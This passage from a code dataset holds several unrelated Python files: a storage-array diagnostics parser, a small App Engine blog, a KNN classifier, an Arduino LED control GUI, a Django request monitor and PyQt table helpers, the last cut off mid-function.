Any]]\n        \"\"\"Parse all fdiags for physical discrepancy space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.physical_discrepancy', 'value'])\n\n    def get_physical_space(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for physical_space.\"\"\"\n        physical_space = []\n        for timestamp, space_info in self._pull_value(['purearray.list.space']):\n            if not space_info:\n                physical_space.append((timestamp, space_info))\n                continue\n            volume = format_utils.to_raw(space_info['volumes'], 'binary_bytes')\n            shared = format_utils.to_raw(space_info['shared_space'], 'binary_bytes')\n            snapshots = 
format_utils.to_raw(space_info['snapshots'], 'binary_bytes')\n system_space = format_utils.to_raw(space_info['system'], 'binary_bytes')\n physical_space.append((timestamp, int(volume + shared + snapshots + system_space)))\n return physical_space\n\n def get_pslun_names(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for pslun_names.\"\"\"\n pslun_names = []\n for timestamp, purevol in self._pull_value(['purevol.list.space']):\n if not purevol:\n pslun_names.append((timestamp, purevol))\n continue\n names = {}\n for volume_name, volume in six.iteritems(purevol):\n if volume_name == '(total)':\n continue\n if 'id' in volume:\n pslun = str(volume['id'])\n elif 'id' in volume.get('space', {}):\n pslun = str(volume['space']['id'])\n else:\n continue\n names[pslun] = volume_name\n pslun_names.append((timestamp, names))\n return pslun_names\n\n def get_purealert_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purealert_list.\"\"\"\n return self._pull_value(['purealert.list'])\n\n def get_pureapp_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for pureapp_list.\"\"\"\n return self._pull_value(['pureapp.list'])\n\n def get_puredb_list_drives(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puredb_list_drives.\"\"\"\n return self._pull_value(['puredb.list.drives'])\n\n def get_puredb_list_job(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puredb_list_job.\"\"\"\n return self._pull_value(['puredb.list.job'])\n\n def get_puredrive_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puredrive_list.\"\"\"\n return self._pull_value(['puredrive.list'])\n\n def get_purehw_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purehw_list.\"\"\"\n return self._pull_value(['purehw.list'])\n\n def get_puremessage_list_audit(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puremessage_list_audit.\"\"\"\n return self._pull_value(['puremessage_list_audit'])\n\n def get_purepod_list_array(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purepod_list_array.\"\"\"\n return self._pull_value(['purepod.list.array'])\n\n def get_purity_version(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purity_version.\"\"\"\n return self._pull_value(['controller.info', 'version', 'product_version'])\n\n def get_reclaimable_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for reclaimable space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.reclaimable', 'value'])\n\n def get_replbond_info(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for replication speed and interfaces.\"\"\"\n replbond_info = []\n for timestamp, interfaces in self._pull_value(['purenetwork.list']):\n if not interfaces:\n replbond_info.append((timestamp, interfaces))\n continue\n for iface_name, config in six.iteritems(interfaces):\n if iface_name != 'replbond':\n continue\n # Depending on Purity version we either have 'status' = enabled or 'enabled' = True\n if not config.get('status') == 'enabled' and not config.get('enabled'):\n continue\n slave_ifs = config.get('slaves', [])\n if not slave_ifs:\n break\n slaves = ', 
'.join(sorted(slave_ifs))\n if config['speed'] == 10**9:\n speed = '1G'\n elif config['speed'] == 10**10:\n speed = '10G'\n else:\n speed = config['speed']\n if not (slaves and speed):\n slaves = \"Replication not enabled\"\n speed = \"Replication not enabled\"\n replbond_info.append((timestamp, {'Replication Speed': speed, 'Replication Slaves': slaves}))\n return replbond_info\n\n def get_reported_pyramid(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for reported pyramid space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.reported_pyramid', 'value'])\n\n def get_reported_raid(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for reported RAID space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.reported_raid', 'value'])\n\n def get_san_targets(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for san_targets.\"\"\"\n san_targets = []\n for timestamp, array_ports in self._pull_value(['pureport.list']):\n if not array_ports:\n san_targets.append((timestamp, array_ports))\n continue\n targets = {'iqn': {}, 'wwn': {}}\n\n for port_name, port in six.iteritems(array_ports):\n iqn = port.get('iqn')\n wwn = port.get('wwn')\n if iqn:\n targets['iqn'][port_name] = iqn\n elif wwn:\n # Convert the raw WWN value to a human readable format.\n readable_wwn = format_utils.split_str(wwn, delim=':', every=2)\n targets['wwn'][port_name] = readable_wwn\n san_targets.append((timestamp, targets))\n return san_targets\n\n def get_sas_port_info(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for sas_port_info.\"\"\"\n sas_port_info = []\n sections = ('index', 'slot', 'speed', 'status')\n for timestamp, purehw in self._pull_value(['purehw.list']):\n if not purehw:\n sas_port_info.append((timestamp, purehw))\n continue\n sas_ports = {'ct0': {}, 'ct1': {}}\n for part_name, part in six.iteritems(purehw):\n full_part_name = part_name.lower()\n if not full_part_name.startswith('ct'):\n continue\n if part['type'] == 'sas_port':\n ctlr, part_name = part['name'].lower().split('.', 1)\n sas_port = {}\n for info in sections:\n if info in part:\n sas_port[info] = part[info]\n wwn = hex(part.get('wwn')).replace('0x', '').upper()\n sas_port['wwn'] = ':'.join([x+y for x, y in zip(wwn[::2], wwn[1::2])])\n sas_ports[ctlr][part_name] = sas_port\n sas_port_info.append((timestamp, sas_ports))\n return sas_port_info\n\n def get_serials(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for serials.\"\"\"\n serials = []\n enclosure_types = ['chassis', 'controller', 'storage_shelf']\n for timestamp, purehw in self._pull_value(['purehw.list']):\n if not purehw:\n serials.append((timestamp, purehw))\n continue\n enclosures = [part for part in six.itervalues(purehw) if part['type'] in enclosure_types]\n hw_serials = {}\n for part in enclosures:\n name = part['name'].lower()\n serial = part['handle'].split('_')[-1]\n if name == 'ctx':\n name = self.get_field('ct_num')\n hw_serials[name] = serial.lower()\n serials.append((timestamp, hw_serials))\n return serials\n\n def get_shared_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for shared_space.\"\"\"\n return self._pull_value(['purearray.list.space', 'shared_space'])\n\n def get_snapshot_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for snapshot_space.\"\"\"\n return 
self._pull_value(['purearray.list.space', 'snapshots'])\n\n    def get_ssd_capacity(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for ssd_capacity.\"\"\"\n        ssd_capacity = []\n        for timestamp, puredrive in self._pull_value(['puredrive.list']):\n            if not puredrive:\n                ssd_capacity.append((timestamp, puredrive))\n                continue\n            healthy_drives = [drv for drv in six.itervalues(puredrive) if drv['status'] == 'healthy']\n            # PT-2242: Check status before type.\n            # If a drive has a status of 'unused', then it won't have a type key.\n            capacity = sum([int(drive['capacity']) for drive in healthy_drives if drive['type'] == 'SSD'])\n            ssd_capacity.append((timestamp, int(capacity)))\n        return ssd_capacity\n\n    def get_ssd_mapped(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for ssd_mapped.\"\"\"\n        return self._pull_value(['puredb.list.ssd_mapped', 'bytes'])\n\n    def get_system_space(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for system_space.\"\"\"\n        return self._pull_value(['purearray.list.space', 'system'])\n\n    def get_thin_provisioning(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for thin_provisioning.\"\"\"\n        return self._pull_value(['purearray.list.space', 'thin_provisioning'])\n\n    def get_total_reduction(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for total_reduction.\"\"\"\n        return self._pull_value(['purearray.list.space', 'total_reduction'])\n\n    def get_triage_error(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, int]]\n        \"\"\"Parse all fdiags for triage_error space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.triage_error', 'value'])\n\n    def get_unknown_space(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for unknown space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.space_summary_unknown', 'value'])\n\n    def get_unreachable_extent_phys(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, str]]\n        \"\"\"Parse all fdiags for unreachable_extent_phys space.\"\"\"\n        values = self._pull_value(['puredb.dump.health', 'space.unreachable_extent_phys', 'value'])\n        results = []\n        # These are a count so we need a string not an int.\n        for timestamp, value in values:\n            if value:\n                value = str(value)\n            results.append((timestamp, value))\n        return results\n\n    def get_unreported_pyramid(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for unreported pyramid space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.unreported_pyramid', 'value'])\n\n    def get_unreported_raid(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for unreported RAID space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.unreported_raid', 'value'])\n\n    def get_unreported_ratio(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, float]]\n        \"\"\"Parse all fdiags for unreported_ratio space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.unreported_ratio', 'value'])\n\n    def get_unreported_space(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for unreported_space.\"\"\"\n        unreported_space = []\n        # Diagnosing: High System/Unreported Space wiki.\n        # https://wiki.purestorage.com/pages/viewpage.action?pageId=23995245\n        # unreported = ssd_mapped - ((volume + shared + snapshots) / 0.778)  # 0.778 == 1 - 2/9\n        ssd_mapped 
= self.get_field('ssd_mapped')\n shared_space = self.get_field('shared_space')\n snapshot_space = self.get_field('snapshot_space')\n volume_space = self.get_field('volume_space')\n for index, mapped_tuple in enumerate(ssd_mapped):\n timestamp = mapped_tuple[0]\n if not mapped_tuple[1]:\n unreported_space.append((timestamp, mapped_tuple[1]))\n continue\n mapped = mapped_tuple[1]\n volume = volume_space[index][1]\n shared = shared_space[index][1]\n snapshot = snapshot_space[index][1]\n used = volume + shared + snapshot\n unreported = int(mapped - (used / 0.778))\n if unreported < 0:\n unreported = 0\n unreported_space.append((timestamp, unreported))\n return unreported_space\n\n def get_visible_system_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for visible_system_space space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.visible_system_space', 'value'])\n\n def get_volume_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for volume_space.\"\"\"\n return self._pull_value(['purearray.list.space', 'volumes'])\n\n def get_vector_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for vector space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.vector_space', 'value'])\n\n\ndef _flatten_json_section(json_blob):\n # type: (Dict[str, Any]) -> Dict[str, Any]\n \"\"\"Flatten a section of the JSON blob by using sub-keys.\"\"\"\n flattened = defaultdict(dict)\n for section, contents in six.iteritems(json_blob):\n # PT-2160: puredb list drives needs own logic otherwise all drives are not found.\n if section == 'puredb.list.drives':\n flattened[section] = contents\n continue\n if isinstance(contents, list):\n if len(contents) == 1:\n flattened[section] = contents[0]\n else:\n temp = {}\n for item in contents:\n if isinstance(item, dict):\n if 'name' in item:\n temp[item['name']] = item\n else:\n temp.update(item)\n else:\n # We cannot reliably unpack this further.\n temp = contents\n break\n flattened[section] = temp\n elif isinstance(contents, dict):\n flattened[section] = _flatten_json_section(contents)\n else:\n flattened[section] = contents\n return dict(flattened)\n","sub_path":"backend/pure/logs/frequentdiagnostics.py","file_name":"frequentdiagnostics.py","file_ext":"py","file_size_in_byte":29104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191677541","text":"import webapp2\nimport os\nimport sys\nimport re\nimport cgi\nimport jinja2\nfrom google.appengine.ext import db\n\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\nfile_system_loader = jinja2.FileSystemLoader(template_dir)\njinja_env = jinja2.Environment(loader = file_system_loader, autoescape = True)\n\n\n\nclass BaseHandler(webapp2.RequestHandler):\n def render(self, template, **kwd):\n t = jinja_env.get_template(template)\n self.response.out.write(t.render(kwd))\n return\n\nclass Blog(db.Model):\n subject = db.StringProperty(required = True)\n content = db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n \n\nclass MainPage(BaseHandler):\n def get(self):\n blogs = db.GqlQuery(\"SELECT * FROM Blog ORDER BY created DESC\")\n self.render('blog.html', blogs=blogs)\n return\n\nclass NewPost(BaseHandler):\n def get(self):\n self.render('newpost-form.html')\n return\n \n def post(self):\n subject = self.request.get('subject')\n content = self.request.get('content')\n\n 
if subject and content:\n            blog = Blog(subject = subject, content = content)\n            blog.put()\n            self.redirect('/newentry/%d' % blog.key().id())\n        else:\n            self.render('newpost-form.html',\n                        subject = subject,\n                        content = content,\n                        error = \"You must enter both a subject and some content.\")\n\nclass NewEntry(BaseHandler):\n    def get(self, post_id):\n        key = db.Key.from_path('Blog', int(post_id))\n        blog = db.get(key)\n\n        if not blog:\n            self.error(404)\n            return\n        \n        self.render('new_entry-display.html', blog = blog)\n        return\n    \n    \napp = webapp2.WSGIApplication([('/', MainPage),\n                               ('/newpost', NewPost),\n                               ('/newentry/([0-9]+)', NewEntry)],\n                              debug=True)\n","sub_path":"unit3_blog/unit3_blog.py","file_name":"unit3_blog.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"268541957","text":"from __future__ import print_function, division\n\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom collections import Counter\n\nclass KNN(object):\n    def __init__(self, n_neighbors=3):\n        self.K = n_neighbors\n        return\n\n    def fit(self, train_X, train_y):\n        if isinstance(train_X, pd.DataFrame) or isinstance(train_X, pd.Series):\n            train_X = train_X.values\n        if isinstance(train_y, pd.DataFrame) or isinstance(train_y, pd.Series):\n            train_y = train_y.values\n\n        assert len(train_X)==len(train_y), 'train_X must have the same length as train_y'\n        self.train_X = train_X\n        self.train_y = train_y\n        return\n    \n    def get_result(self, x_vector):\n        X_diff = self.train_X - x_vector\n        X_diff **= 2\n        distance_vector = X_diff.sum(axis=1)\n        sorted_idx = np.argsort(np.sqrt(distance_vector))\n        # use the fitted labels; referring to a global train_y here was a bug\n        y_labels = self.train_y[sorted_idx]\n        y_labels = Counter(y_labels[:self.K])\n        y = max(y_labels.keys(), key=lambda x:y_labels[x])\n        return y\n    \n    def predict(self, test_X):\n        if isinstance(test_X, pd.DataFrame):\n            test_X = test_X.values\n        \n        if test_X.ndim==1:\n            test_X.resize((1, len(test_X)))\n        \n        assert test_X.shape[1]==self.train_X.shape[1], 'test_X must have the same width as train_X'\n        \n        y_list = []\n        for i in range(test_X.shape[0]):\n            x_vector = test_X[i, :]\n            y = self.get_result(x_vector)\n            y_list.append(y)\n        \n        return np.array(y_list)\n    \n# test\nif __name__=='__main__':\n    from sklearn.model_selection import train_test_split\n    from sklearn.datasets import fetch_mldata\n    from sklearn.neighbors import KNeighborsClassifier\n    from sklearn.metrics import accuracy_score\n\n#-------------------------------------------------------------\n\n#    train_X = np.array([[1, 1, 1],\n#                        [2, 2, 2],\n#                        [3, 3, 3],\n#                        [4, 4, 4],\n#                        [5, 5, 5]])\n#    train_y = np.array([0, 1, 1, 1, 1])\n#    test_X = np.array([0, 0, 0])\n    \n#-------------------------------------------------------------\n    \n    data_path = ('C:/D_Disk/machine_learning_in_action/'\n                 'machinelearninginaction-master/Ch02/digits/')\n    train_X = np.loadtxt(data_path + 'train_X.txt')\n    train_y = np.loadtxt(data_path + 'train_y.txt')\n    test_X = np.loadtxt(data_path + 'test_X.txt')\n    test_y = np.loadtxt(data_path + 'test_y.txt')\n    print('train_X is', train_X.shape)\n    print('train_y is', train_y.shape)\n    print('test_X is', test_X.shape)\n    print('test_y is', test_y.shape)\n    \n#------------------------------------------------------------------\n    \n#    SEED = 911\n#    train_df = pd.read_csv('C:/D_Disk/tsg_prog/Digit_Recognizer/mnist_train.csv')\n#    train_df = train_df.sample(20000)\n#    print('train_df.shape is ', train_df.shape)\n#    train_y = train_df['label'].values\n#    train_X = train_df.drop(['label'], axis=1).values\n# 
train_X, test_X, train_y, test_y = train_test_split(train_X,\n#                                                        train_y, test_size=0.025, random_state=SEED)\n#    \n#    print('after train_test_split, train_X.shape: ', train_X.shape,\n#          'train_y.shape: ', train_y.shape)\n\n#------------------------------------------------------------------\n    \n    start_t = time.time()\n    knn = KNN(n_neighbors=3)\n    knn.fit(train_X, train_y)\n    y_pred = knn.predict(test_X)\n    print('accuracy is ', accuracy_score(test_y, y_pred),\n          'cost time: ', time.time()-start_t)\n\n    start_t = time.time()\n    neigh = KNeighborsClassifier(n_neighbors=3)\n    neigh.fit(train_X, train_y) \n    y_pred_sklearn = neigh.predict(test_X)\n    print('accuracy is ', accuracy_score(test_y, y_pred_sklearn),\n          'cost time: ', time.time()-start_t)\n    \n    \n    \n","sub_path":"k_nearest_neighbors.py","file_name":"k_nearest_neighbors.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"602049937","text":"import serial\nimport tkinter as tk\nser = serial.Serial('COM7', 9600, timeout=1)\nLED_ON = '1'\nLED_OFF = '0'\n\n\nclass ButtonsApp(tk.Tk):\n    def __init__(self):\n        super().__init__()\n        self.btn_on = tk.Button(\n            self, text=\"On\", relief=tk.RAISED, command=self.on)\n        self.btn_off = tk.Button(\n            self, text=\"Off\", relief=tk.RAISED, command=self.off)\n        self.btn_on.pack(padx=40, pady=10, side=tk.LEFT)\n        self.btn_off.pack(padx=40, pady=10, side=tk.LEFT)\n\n    def on(self):\n        ser.write(LED_ON.encode('utf-8'))  # send over the serial port, encoded as a byte string\n        print(\"LED is on!\")\n\n    def off(self):\n        ser.write(LED_OFF.encode('utf-8'))  # send over the serial port, encoded as a byte string\n        print(\"LED is off!\")\n\n\nif __name__ == \"__main__\":\n    app = ButtonsApp()\n    app.title(\"Control the Arduino LED with buttons\")\n    app.mainloop()\n\n# Bluetooth serial communication\n","sub_path":"pyserial/Python+Arduino 图形化开发/lesson25.py","file_name":"lesson25.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"274628357","text":"from django.http import HttpResponse, HttpResponseBadRequest\nfrom django.views.decorators.http import require_GET\nfrom django.shortcuts import render\nfrom .models import Requests\nimport logging\nimport json\nimport operator\nimport re\nimport time\n\n\nlogger = logging.getLogger(__name__)\n\nREQ_ORDERING = {\n    0: 'chronological',\n    1: 'reverse',\n}\n\nREQ_PRIORITY = {\n    0: 'all requests',\n    1: '1 or greater',\n}\n\n\ndef render_to_json_response(context, **response_kwargs):\n    data = json.dumps(context)\n    response_kwargs['content_type'] = 'application/json'\n    return HttpResponse(data, **response_kwargs)\n\n\n@require_GET\ndef index(request):\n    priority = request.GET.get('priority', '0')\n    priority = int(priority) if re.match('^\\\\d+$', priority) else None\n    reverse = request.GET.get('reverse', '1')\n    reverse = int(reverse) if re.match('^\\\\d+$', reverse) else None\n\n    if priority not in REQ_PRIORITY or reverse not in REQ_ORDERING:\n        logger.debug('index GET: %s (pri: %s, rev: %s)' % (request.GET,\n                                                           priority,\n                                                           reverse))\n        return HttpResponseBadRequest()\n\n    requests = Requests.objects.order_by('-id') \\\n                               .filter(priority__gte=priority)[:10]\n    latest = requests[0].id if requests else 0\n    requests = sorted(requests,\n                      key=operator.attrgetter('id'),\n                      reverse=bool(reverse))\n    context = {'requests': requests, 'latest': latest,\n               'priority': priority, 'reverse': reverse,\n               'priorities': REQ_PRIORITY, 'ordering': REQ_ORDERING}\n\n    return render(request, 'reqmon/index.html', context)\n\n\n@require_GET\ndef updates(request):\n    last = 
request.GET.get('last', '0')\n    last = int(last) if re.match('^\\\\d+$', last) else None\n    priority = request.GET.get('priority', '0')\n    priority = int(priority) if re.match('^\\\\d+$', priority) else None\n\n    if request.is_ajax() and last is not None and priority in REQ_PRIORITY:\n        qs = Requests.objects.order_by('id')\n        filter_kwargs = {'pk__gt': last,\n                         'priority__gte': priority}\n        while True:\n            requests = qs.filter(**filter_kwargs)\n            if requests:\n                break\n            else:\n                time.sleep(.5)\n\n        latest = requests[len(requests)-1].id if requests else last\n        result = [{'timestamp': str(r.timestamp),\n                   'method': r.method, 'path': r.path}\n                  for r in requests]\n        data = {'result': 'OK', 'latest': latest, 'requests': result}\n        return render_to_json_response(data)\n\n    else:\n        logger.debug('updates GET: %s' % request.GET)\n        data = {'result': 'ERROR'}\n        return render_to_json_response(data, status=400)\n","sub_path":"apps/reqmon/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"168603444","text":"# -*- coding: utf-8 -*-\n# @Time    : 18-12-5 3:22 PM\n# @Author  : 张帆\n# @Site    : \n# @File    : tool.py\n# @Software: PyCharm\nimport csv\nimport hashlib\nimport json\nimport socket\nimport subprocess\nimport time\n\nfrom PyQt5.QtCore import QFile, QTextStream, Qt, QVariant, QItemSelection, QItemSelectionModel, QThread, QWaitCondition, \\\n    QMutex\nfrom PyQt5.QtGui import QStandardItem, QFont\nfrom PyQt5.QtWidgets import QTableView, QMessageBox\nfrom configobj import ConfigObj\n\nfrom profile import profile\n\n\ndef str_to_time_stamp(date_str, format_str='%Y/%m/%d'):\n    '''Convert a date string such as 2018/12/12 into a timestamp'''\n    if date_str:\n        time_now = time.mktime(time.strptime(date_str, format_str))\n        return time_now\n    else:\n        return 0\n\n\ndef time_stamp_to_str(time_stamp, format_str='%Y/%m/%d'):\n    '''Convert a timestamp into a formatted date string such as 2018/12/12'''\n    if time_stamp:\n        time_now = time.strftime(format_str, time.localtime(time_stamp))\n        return time_now\n    else:\n        return \"0\"\n\n\ndef find_column_by_name(table_model, header_name):\n    '''Find the index of the column with the given header name'''\n    column_nums = table_model.columnCount()\n    for column in range(column_nums):\n        name = table_model.headerData(column, Qt.Horizontal)\n        if name == header_name:\n            return column\n    return 0\n\n\ndef search_aim_row_data(table_model, row):\n    '''Collect all data from the given row'''\n    column_nums = table_model.columnCount()\n    row_data = []\n    for column in range(column_nums):\n        model_index = table_model.index(row, column)\n        data = table_model.data(model_index)\n        row_data.append(data)\n    return row_data\n\n\ndef search_aim_item_row_data(table_model, item, column):\n    '''Find all data of the row whose value in the given column equals item'''\n    result = []\n    for row in range(table_model.rowCount()):\n        model_index = table_model.index(row, column)\n        data = table_model.data(model_index)\n        if data == item:\n            for column in range(table_model.columnCount()):\n                model_index = table_model.index(row, column)\n                data = table_model.data(model_index)\n                result.append(data)\n            return result, row\n    # no row matched; returning inside the loop's else branch was a bug that only ever checked row 0\n    # print(\"combined order number not found\")\n    return None, None\n\n\ndef getMsTime():\n    return int(time.time() * 1000)\n\n\ndef traversal_dict(adict):\n    # return a cyclic iterator over the dict's \"groupN\" entries\n    i = len(adict) - 1\n    while True:\n        length = len(adict)\n        i = i % length\n        yield adict[\"group\" + str(i)]\n        i -= 1\n\n\ndef add_row_data_to_table_model(table_model, row_data, aim_column, row):\n    '''Add a row of data to table_model, preferring replacement: if row_data[aim_column] already appears at (row, aim_column) or in aim_column, replace that row, otherwise append'''\n    if row_data[aim_column] == table_model.data(table_model.index(row, 
aim_column)):\n        update_table_one_row(table_model, row_data, row)\n    else:\n        # print(\"/11231231231\", row_data[aim_column])\n        aim_row = search_aim_item_row(table_model, row_data[aim_column], aim_column)\n        if aim_row == -1:\n            table_model.appendRow(transfer_table_data(row_data))\n        else:\n            update_table_one_row(table_model, row_data, aim_row)\n\n\ndef add_row_data_to_table_model_search(table_model, row_data, aim_column):\n    aim_row = search_aim_item_row(table_model, row_data[aim_column], aim_column)\n    if aim_row == -1:\n        table_model.appendRow(transfer_table_data(row_data))\n    else:\n        update_table_one_row_by_delete(table_model, row_data, aim_row)\n\n\ndef update_table_one_row_by_delete(table_model, data, row):\n    '''Update row in the table by removing it and re-inserting the new data'''\n    table_model.removeRow(row)\n    table_model.insertRow(row, transfer_table_data(data))\n\n\ndef add_row_data_to_table_model_jiacu(table_mode, row_data, aim_column, row, if_jiacu, font):\n    '''Like add_row_data_to_table_model, but also sets column 5 to bold or normal according to if_jiacu (bold flag)'''\n    if row_data[aim_column] == table_mode.data(table_mode.index(row, aim_column)):\n        update_table_one_row(table_mode, row_data, row)\n        if if_jiacu:\n            table_mode.item(row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Bold))\n        else:\n            table_mode.item(row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Normal))\n    else:\n        # print(\"/11231231231\", row_data[aim_column])\n        aim_row = search_aim_item_row(table_mode, row_data[aim_column], aim_column)\n        if aim_row == -1:\n            table_mode.appendRow(transfer_table_data(row_data))\n            if if_jiacu:\n                table_mode.item(table_mode.rowCount() - 1, 5).setFont(\n                    QFont(font.family(), font.pointSize(), QFont.Bold))\n            else:\n                table_mode.item(table_mode.rowCount() - 1, 5).setFont(\n                    QFont(font.family(), font.pointSize(), QFont.Normal))\n        else:\n            update_table_one_row(table_mode, row_data, aim_row)\n            if if_jiacu:\n                table_mode.item(aim_row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Bold))\n            else:\n                table_mode.item(aim_row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Normal))\n\n\ndef hide_all_row(tableView, model):\n    '''Hide all rows of the tableview'''\n    for row in range(model.rowCount()):\n        tableView.hideRow(row)\n\n\ndef show_all_row(tableView, model):\n    '''Show all rows of the tableview'''\n    for row in range(model.rowCount()):\n        tableView.showRow(row)\n\n\ndef getstylesheetfromQss(qss_path):\n    file = QFile(qss_path)\n    file.open(QFile.ReadOnly)\n    ts = QTextStream(file)\n\n    stylesheet = ts.readAll()\n    return stylesheet\n\n\ndef get_password_md5(password_real):\n    '''Return the MD5 digest of the login password'''\n    return hashlib.md5(password_real.encode('utf-8')).hexdigest()\n\n\ndef selectMulRows(modelIndexList, table_view):\n    \"Select the rows of the given model indexes in the table\"\n    selection_model = table_view.selectionModel()\n    table_model = table_view.model()\n    if not modelIndexList:\n        return\n    selection = QItemSelection()\n    for index in modelIndexList:\n        left = table_model.index(index.row(), 0)\n        right = table_model.index(index.row(), table_model.columnCount() - 1)\n        sel = QItemSelection(left, right)\n        selection.merge(sel, QItemSelectionModel.Select)\n    selection_model.select(selection, QItemSelectionModel.Select)\n\n\ndef search_aim_item_row(table_model, item, column):\n    '''Find the row whose value in the given column equals item'''\n\n    for row in range(table_model.rowCount()):\n        model_index = table_model.index(row, column)\n        data = table_model.data(model_index)\n        if data == item:\n            return row\n    return -1\n\n\ndef remove_aim_item_row(table_model, item, column):\n    '''Remove every row whose value in the given column equals item'''\n    # iterate in reverse so that removing a row does not shift the rows still to be checked\n    for row in reversed(range(table_model.rowCount())):\n        model_index = table_model.index(row, 
column)\n        data = table_model.data(model_index)\n        if data == item:\n            table_model.removeRow(row)\n\n\ndef update_table_one_row(table_model, data, row):\n    '''Update the data of the given row in the table'''\n    for column in range(table_model.columnCount()):\n        table_model.setData(table_model.index(row, column), data[column], Qt.EditRole)\n\n\ndef findSubStr(substr, str, i):\n    count = 0\n    while i > 0:\n        index = str.find(substr)\n        if index == -1:\n            return -1\n        else:\n            str = str[index + 1:]\n            i -= 1\n            count = count + index + 1\n    return count - 1\n\n\ndef insert(original, new, pos):\n    '''Inserts new inside original at pos.'''\n    return original[:pos] + new + original[pos:]\n\n\n# The functions below implement paging for QTableView; reinventing this wheel because no paging API is provided\ndef pageCount(tableView: QTableView):\n    '''Compute the total number of pages of a QTableView'''\n    if tableView is None:\n        return -1\n    rowCount = tableView.model().rowCount()  # QTableView itself has no rowCount(); ask the model\n    rowHeight = tableView.rowHeight(0)\n    if rowHeight == 0:\n        return 1\n    tableViewHeight = tableView.height()\n    rowCountPerPage = tableViewHeight // rowHeight - 1  # rows shown per page\n    ret = rowCount // rowCountPerPage\n    tem = rowCount % rowCountPerPage\n    if tem != 0:\n        ret += 1\n\n    return ret\n\n\ndef pageTo(tableView: QTableView, pageNO):\n    '''Jump to the given page'''\n    if tableView is None:\n        return\n    maxPage = pageCount(tableView)\n    if pageNO > maxPage:\n        return\n    rowCount = tableView.model().rowCount()\n    rowHeight = 